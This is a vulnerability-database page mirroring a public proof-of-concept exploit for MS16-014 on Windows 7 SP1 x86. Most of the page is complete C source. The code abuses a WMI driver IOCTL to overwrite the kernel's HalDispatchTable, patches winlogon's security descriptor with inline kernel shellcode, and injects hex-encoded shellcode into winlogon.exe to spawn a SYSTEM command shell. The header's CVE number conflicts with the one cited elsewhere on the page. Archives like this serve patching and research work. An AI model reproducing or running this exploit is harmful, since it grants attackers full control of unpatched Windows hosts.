Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Windows 7 SP1 (x86) - Privilege Escalation (MS16-014)

🗓️ 29 Jun 2016 00:00:00Reported by blomster81Type 
zdt
 zdt🔗 0day.today👁 55 Views

Privilege Escalation on Windows 7 SP1 x86 through MS16-014 EoP PoC that spawns CMD.exe with SYSTEM rights and overwrites HaliSystemQueryInformation, leading to BSOD

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Windows WMI Recieve Notification Exploit
4 May 201800:00
zdt
IBM Security Bulletins		Security Bulletin: Multiple vulnerabilities in IBM WebSphere eXtreme Scale Client could expose sensitive information (CVE-2016-2861, CVE-2016-0400)
15 Jun 201807:05
ibm
GithubExploit		Exploit for CVE-2016-0040
3 Aug 201722:28
githubexploit
GithubExploit		Exploit for CVE-2016-0040
26 Feb 201618:00
githubexploit
ATTACKERKB		CVE-2016-0040
10 Feb 201600:00
attackerkb
BDU FSTEC		The vulnerability of the Windows operating system, which allows a hacker to increase their privileges
2 Mar 201600:00
bdu_fstec
Circl		CVE-2016-0040
4 May 201800:00
circl
CISA KEV Catalog		Microsoft Windows Kernel Privilege Escalation Vulnerability
28 Mar 202200:00
cisa_kev
CNVD		Microsoft Windows Elevation of Privilege Vulnerability (CNVD-2016-01082)
11 Feb 201600:00
cnvd
CNVD		IBM WebSphere eXtreme Scale HTTP Response Splitting Vulnerability
31 May 201600:00
cnvd
Rows per page
/* 
# Exploit Title: Elevation of privilege on Windows 7 SP1 x86
# Date: 28/06-2016
# Exploit Author: @blomster81
# Vendor Homepage: www.microsoft.com
# Version: Windows 7 SP1 x86
# Tested on: Windows 7 SP1 x86
# CVE : 2016-0400
 
MS16-014 EoP PoC created from 
https://github.com/Rootkitsmm/cve-2016-0040/blob/master/poc.cc
Spawns CMD.exe with SYSTEM rights. 
Overwrites HaliSystemQueryInformation, but does not replace it, so BSOD will occur at some point
 
********* EDB Note *********
 
ntos.h is available here: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40039.zip
 
***************************
 
*/
 
#include "stdafx.h"
#include <Windows.h>
#include <winioctl.h>
#include "ntos.h"
#include <TlHelp32.h>
 
 
typedef union {
    HANDLE Handle;
    ULONG64 Handle64;
    ULONG32 Handle32;
}
HANDLE3264, *PHANDLE3264;
 
typedef struct {
    ULONG HandleCount;
    ULONG Action;
    HANDLE /* PUSER_THREAD_START_ROUTINE */ UserModeCallback;
    HANDLE3264 UserModeProcess;
    HANDLE3264 Handles[20];
}
WMIRECEIVENOTIFICATION, *PWMIRECEIVENOTIFICATION;
 
#define RECEIVE_ACTION_CREATE_THREAD 2 // Mark guid objects as requiring
 
typedef struct {
    IN VOID * ObjectAttributes;
    IN ACCESS_MASK DesiredAccess;
 
    OUT HANDLE3264 Handle;
}
WMIOPENGUIDBLOCK, *PWMIOPENGUIDBLOCK;
 
typedef enum _KPROFILE_SOURCE {
    ProfileTime,
    ProfileAlignmentFixup,
    ProfileTotalIssues,
    ProfilePipelineDry,
    ProfileLoadInstructions,
    ProfilePipelineFrozen,
    ProfileBranchInstructions,
    ProfileTotalNonissues,
    ProfileDcacheMisses,
    ProfileIcacheMisses,
    ProfileCacheMisses,
    ProfileBranchMispredictions,
    ProfileStoreInstructions,
    ProfileFpInstructions,
    ProfileIntegerInstructions,
    Profile2Issue,
    Profile3Issue,
    Profile4Issue,
    ProfileSpecialInstructions,
    ProfileTotalCycles,
    ProfileIcacheIssues,
    ProfileDcacheAccesses,
    ProfileMemoryBarrierCycles,
    ProfileLoadLinkedIssues,
    ProfileMaximum
 
} KPROFILE_SOURCE, *PKPROFILE_SOURCE;
 
typedef struct _DESKTOPINFO
{
    /* 000 */ PVOID        pvDesktopBase;
    /* 008 */ PVOID        pvDesktopLimit;
 
} DESKTOPINFO, *PDESKTOPINFO;
 
 
typedef struct _CLIENTINFO
{
    /* 000 */ DWORD             CI_flags;
    /* 004 */ DWORD             cSpins;
    /* 008 */ DWORD             dwExpWinVer;
    /* 00c */ DWORD             dwCompatFlags;
    /* 010 */ DWORD             dwCompatFlags2;
    /* 014 */ DWORD             dwTIFlags;
    /* 018 */ DWORD             filler1;
    /* 01c */ DWORD             filler2;
    /* 020 */ PDESKTOPINFO      pDeskInfo;
    /* 028 */ ULONG_PTR         ulClientDelta;
 
} CLIENTINFO, *PCLIENTINFO;
 
typedef struct _HANDLEENTRY {
    PVOID  phead;
    ULONG_PTR  pOwner;
    BYTE  bType;
    BYTE  bFlags;
    WORD  wUniq;
}HANDLEENTRY, *PHANDLEENTRY;
 
typedef struct _SERVERINFO {
    DWORD dwSRVIFlags;
    DWORD64 cHandleEntries;
    WORD wSRVIFlags;
    WORD wRIPPID;
    WORD wRIPError;
}SERVERINFO, *PSERVERINFO;
 
typedef struct _SHAREDINFO {
    PSERVERINFO psi;
    PHANDLEENTRY aheList;
    ULONG HeEntrySize;
    ULONG_PTR pDispInfo;
    ULONG_PTR ulSharedDelta;
    ULONG_PTR awmControl;
    ULONG_PTR DefWindowMsgs;
    ULONG_PTR DefWindowSpecMsgs;
}SHAREDINFO, *PSHAREDINFO;
 
#define IOCTL_WMI_RECEIVE_NOTIFICATIONS CTL_CODE(FILE_DEVICE_UNKNOWN, 0x51, METHOD_BUFFERED, FILE_WRITE_ACCESS)
 
typedef ULONG(__stdcall *g_ZwMapUserPhysicalPages)(PVOID, ULONG, PULONG);
typedef NTSTATUS(_stdcall *_NtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
typedef NTSTATUS(_stdcall *_NtQueryIntervalProfile)(KPROFILE_SOURCE ProfilSource, PULONG Interval);
 
DWORD g_HalDispatchTable = 0;
void* kHandle;
HWND g_window = NULL;
const WCHAR g_windowClassName[] = L"Victim_Window";
WNDCLASSEX wc;
PSHAREDINFO g_pSharedInfo;
PSERVERINFO g_pServerInfo;
HANDLEENTRY* g_UserHandleTable;
 
LRESULT CALLBACK WProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
    return DefWindowProc(hwnd, uMsg, wParam, lParam);
}
 
DWORD getProcessId(wchar_t* str)
{
    HANDLE hProcessSnap;
    PROCESSENTRY32 pe32;
    DWORD PID;
 
    hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcessSnap == INVALID_HANDLE_VALUE)
    {
        return 0;
    }
 
    pe32.dwSize = sizeof(PROCESSENTRY32);
    if (!Process32First(hProcessSnap, &pe32))
    {
        CloseHandle(hProcessSnap);
        return 0;
    }
 
    do
    {
        if (!wcscmp(pe32.szExeFile, str))
        {
            wprintf(L"Process: %s found\n", pe32.szExeFile);
            PID = pe32.th32ProcessID;
            return PID;
        }
    } while (Process32Next(hProcessSnap, &pe32));
    return 0;
}
 
void Launch()
{
    void* pMem;
    char shellcode[] =
        "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
        "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
        "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
        "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
        "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
        "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
        "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
        "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
        "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
        "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
        "\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a"
        "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
        "\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e"
        "\x65\x78\x65\x00";
 
    wchar_t* str = L"winlogon.exe";
    DWORD PID = getProcessId(str);
    HANDLE hEx = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
    pMem = VirtualAllocEx(hEx, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    DWORD res = WriteProcessMemory(hEx, pMem, shellcode, sizeof(shellcode), 0);
    HANDLE res2 = CreateRemoteThread(hEx, NULL, 0, (LPTHREAD_START_ROUTINE)pMem, NULL, 0, NULL);
}
 
BOOL leakHal()
{
    _NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "NtQuerySystemInformation");
    PRTL_PROCESS_MODULES pModuleInfo;
    DWORD ntoskrnlBase;
    DWORD HalDTUser, HalDTOffset;
    HMODULE userKernel;
 
    pModuleInfo = (PRTL_PROCESS_MODULES)VirtualAlloc(NULL, 0x100000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (pModuleInfo == NULL)
    {
        printf("Could not allocate memory\n");
        return FALSE;
    }
    NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, 0x100000, NULL);
    ntoskrnlBase = (DWORD)pModuleInfo->Modules[0].ImageBase;
    userKernel = LoadLibraryEx(L"ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES);
    if (userKernel == NULL)
    {
        printf("Could not load ntoskrnl.exe\n");
        return FALSE;
    }
 
    HalDTUser = (DWORD)GetProcAddress(userKernel, "HalDispatchTable");
    HalDTOffset = HalDTUser - (DWORD)userKernel;
    g_HalDispatchTable = ntoskrnlBase + HalDTOffset + 0x9000;
    return TRUE;
}
 
BOOL setup()
{
    LoadLibraryA("user32.dll");
 
    wc.cbSize = sizeof(WNDCLASSEX);
    wc.style = 0;
    wc.lpfnWndProc = WProc;
    wc.cbClsExtra = 0;
    wc.cbWndExtra = 0;
    wc.hInstance = NULL;
    wc.hCursor = NULL;
    wc.hIcon = NULL;
    wc.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1);
    wc.lpszMenuName = NULL;
    wc.lpszClassName = g_windowClassName;
    wc.hIconSm = NULL;
 
    if (!RegisterClassEx(&wc))
    {
        printf("Failed to register window: %d\n", GetLastError());
        return FALSE;
    }
    g_window = CreateWindowEx(WS_EX_CLIENTEDGE, g_windowClassName, L"Victim_Window", WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 240, 120, NULL, NULL, NULL, NULL);
    if (g_window == NULL)
    {
        printf("Failed to create window: %d\n", GetLastError());
        return FALSE;
    }
 
    g_pSharedInfo = (PSHAREDINFO)GetProcAddress(LoadLibraryA("user32.dll"), "gSharedInfo");
    g_UserHandleTable = g_pSharedInfo->aheList;
    g_pServerInfo = g_pSharedInfo->psi;
 
    return TRUE;
}
 
DWORD leakWndAddr(HWND hwnd)
{
    DWORD addr = 0;
    HWND kernelHandle = NULL;
 
    for (int i = 0; i < g_pServerInfo->cHandleEntries; i++)
    {
        kernelHandle = (HWND)(i | (g_UserHandleTable[i].wUniq << 0x10));
        if (kernelHandle == hwnd)
        {
            addr = (DWORD)g_UserHandleTable[i].phead;
            break;
        }
    }
    return addr;
}
 
VOID SprayKernelStack() {
    g_ZwMapUserPhysicalPages ZwMapUserPhysicalPages = (g_ZwMapUserPhysicalPages)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "ZwMapUserPhysicalPages");
    if (ZwMapUserPhysicalPages == NULL)
    {
        printf("Could not get ZwMapUserPhysicalPages\n");
        return;
    }
    BYTE buffer[4096];
    DWORD value = g_HalDispatchTable - 0x3C + 0x4;
    for (int i = 0; i < sizeof(buffer) / 4; i++)
    {
        memcpy(buffer + i * 4, &value, sizeof(DWORD));
    }
    printf("Where is at: 0x%x\n", buffer);
    ZwMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);
}
 
__declspec(noinline) int Shellcode()
{
    __asm {
        mov eax, kHandle // WND - Which window? Check this
        mov eax, [eax + 8] // THREADINFO
        mov eax, [eax] // ETHREAD
        mov eax, [eax + 0x150] // KPROCESS
        mov eax, [eax + 0xb8] // flink
        procloop:
        lea edx, [eax - 0xb8] // KPROCESS
        mov eax, [eax]
        add edx, 0x16c // module name
        cmp dword ptr[edx], 0x6c6e6977 // �winl� for winlogon.exe
        jne procloop
        sub edx, 0x170
        mov dword ptr[edx], 0x0 // NULL ACL
        ret
    }
}
 
int main() {
    DWORD dwBytesReturned;
    HANDLE threadhandle;
    WMIRECEIVENOTIFICATION buffer;
    CHAR OutPut[1000];
 
    if (!setup())
    {
        printf("Could not setup window\n");
        return 0;
    }
 
 
    PVOID userSC = VirtualAlloc((VOID*)0x2a000000, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    kHandle = (void*)leakWndAddr(g_window);
    memset(userSC, 0x41, 0x1000);
    memcpy(userSC, Shellcode, 0x40);
 
 
    if (!leakHal())
    {
        printf("Could not leak Hal\n");
        return 0;
    }
    printf("HalDispatchTable is at: 0x%x\n", g_HalDispatchTable);
 
    DWORD value = (DWORD)userSC;
    PBYTE buff = (PBYTE)&buffer;
    for (int i = 0; i < sizeof(buffer) / 4; i++)
    {
        memcpy(buff + i * 4, &value, sizeof(DWORD));
    }
    printf("What is at: 0x%x\n", buff);
 
    buffer.HandleCount = 0;
    buffer.Action = RECEIVE_ACTION_CREATE_THREAD;
    buffer.UserModeProcess.Handle = GetCurrentProcess();
 
    HANDLE hDriver = CreateFileA("\\\\.\\WMIDataDevice", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hDriver != INVALID_HANDLE_VALUE) {
        SprayKernelStack();
 
        if (!DeviceIoControl(hDriver, IOCTL_WMI_RECEIVE_NOTIFICATIONS, &buffer, sizeof(buffer), &OutPut, sizeof(OutPut), &dwBytesReturned, NULL)) {
            return 1;
        }
 
    }
    _NtQueryIntervalProfile NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "NtQueryIntervalProfile");
    ULONG result;
    KPROFILE_SOURCE stProfile = ProfileTotalIssues;
    NtQueryIntervalProfile(stProfile, &result);
    printf("SYSTEM shell comming\n");
    Launch();
    printf("All done, exiting\n");
 
    return 0;
}

#  0day.today [2018-03-14]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Jun 2016 00:00Current
6.3Medium risk
Vulners AI Score6.3
EPSS0.77331
windows 7privilege escalationms16-014eoppoccmd.exesystem rightsbsodhalisystemqueryinformation
55